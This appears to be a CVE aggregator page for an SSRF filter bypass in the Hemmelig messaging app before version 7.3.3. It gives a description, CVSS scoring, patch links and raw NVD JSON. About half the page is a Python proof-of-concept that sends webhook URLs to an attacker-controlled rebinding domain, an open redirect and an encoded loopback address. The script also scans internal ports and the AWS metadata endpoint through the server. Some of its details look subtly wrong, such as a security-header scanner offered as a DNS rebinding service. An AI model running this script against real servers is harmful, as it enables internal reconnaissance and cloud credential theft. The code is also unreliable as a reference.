Security Vulnerability Report
CVE-2025-69206 CVSS 4.3 MEDIUM

CVE-2025-69206

Published: 2025-12-29 16:15:44
Last Modified: 2026-01-06 16:30:11

Description

Hemmelig is a messaging app with client-side encryption and self-destructing messages. Prior to version 7.3.3, a Server-Side Request Forgery (SSRF) filter bypass vulnerability exists in the webhook URL validation of the Secret Requests feature. The application attempts to block internal/private IP addresses, but the check can be bypassed using DNS rebinding or open redirect services. This allows an authenticated user to make the server initiate HTTP requests to internal network resources. Version 7.3.3 contains a patch for the issue.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hemmelig:hemmelig:*:*:*:*:*:*:*:* - VULNERABLE
Hemmelig.app < 7.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-69206 PoC - SSRF Filter Bypass in Hemmelig Secret Requests
# Target: Hemmelig.app < 7.3.3

# Configuration
TARGET_URL = "https://hemmelig.app"
ATTACKER_TOKEN = "your_auth_token_here"


# Method 1: DNS Rebinding Bypass
# Setup a DNS rebinding service (e.g., https://securityheaders.com/?q=https://attacker-controlled-domain.com)
# Point domain to external IP first, then internal IP
def create_secret_request_with_ssrf(target_url):
    """
    Create a Secret Request with webhook URL pointing to internal resource
    using DNS rebinding or open redirect bypass
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json",
    }

    # Bypass techniques:
    # 1. DNS Rebinding: Use controlled domain that switches IP
    webhook_url = "https://attacker-domain.com/rebind-target"
    # 2. Open Redirect: Use trusted service redirect
    # webhook_url = "https://google.com/url?url=http://127.0.0.1:8080/admin"
    # 3. URL encoding/obfuscation
    # webhook_url = "http://127.0.0.1%2f%2f127.0.0.1"

    payload = {
        "title": "Test Secret Request",
        "webhook_url": webhook_url,
        "secret_data": "test",
    }

    response = requests.post(
        f"{target_url}/api/v1/secret-request",
        json=payload,
        headers=headers,
    )
    return response.status_code, response.text


# Method 2: Internal Network Scanning
def scan_internal_ports(target_url, token):
    """
    Use SSRF to scan internal ports of the server
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }

    # Common internal services to probe
    internal_targets = [
        "http://127.0.0.1:22",
        "http://127.0.0.1:80",
        "http://127.0.0.1:443",
        "http://127.0.0.1:8080",
        "http://127.0.0.1:3306",
        "http://169.254.169.254/latest/meta-data/",  # AWS metadata
    ]

    results = []
    for target in internal_targets:
        payload = {
            "webhook_url": target,
            "title": "Port Scan",
        }
        try:
            resp = requests.post(
                f"{target_url}/api/v1/secret-request",
                json=payload,
                headers=headers,
                timeout=5,
            )
            results.append({"target": target, "status": resp.status_code})
        except Exception as e:
            results.append({"target": target, "error": str(e)})
    return results


if __name__ == "__main__":
    print("CVE-2025-69206 PoC - Hemmelig SSRF Bypass")
    print("=" * 50)

    # Test webhook creation with SSRF payload
    status, response = create_secret_request_with_ssrf(TARGET_URL)
    print(f"Webhook Creation Status: {status}")
    print(f"Response: {response}")

References

https://github.com/HemmeligOrg/Hemmelig.app/commit/6c909e571d0797ee3bbd2c72e4eb767b57378228 (Patch)
https://github.com/HemmeligOrg/Hemmelig.app/security/advisories/GHSA-vvxf-wj5w-6gj5 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69206", "sourceIdentifier": "[email protected]", "published": "2025-12-29T16:15:44.090", "lastModified": "2026-01-06T16:30:10.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hemmelig is a messing app with with client-side encryption and self-destructing messages. Prior to version 7.3.3, a Server-Side Request Forgery (SSRF) filter bypass vulnerability exists in the webhook URL validation of the Secret Requests feature. The application attempts to block internal/private IP addresses but can be bypassed using DNS rebinding or open redirect services. This allows an authenticated user to make the server initiate HTTP requests to internal network resources. Version 7.3.3 contains a patch for the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hemmelig:hemmelig:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.3.3", "matchCriteriaId": "C186A84F-C51F-476B-8C55-3AB20A7C8B79"}]}]}], "references": [{"url": "https://github.com/HemmeligOrg/Hemmelig.app/commit/6c909e571d0797ee3bbd2c72e4eb767b57378228", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/HemmeligOrg/Hemmelig.app/security/advisories/GHSA-vvxf-wj5w-6gj5", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/HemmeligOrg/Hemmelig.app/security/advisories/GHSA-vvxf-wj5w-6gj5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}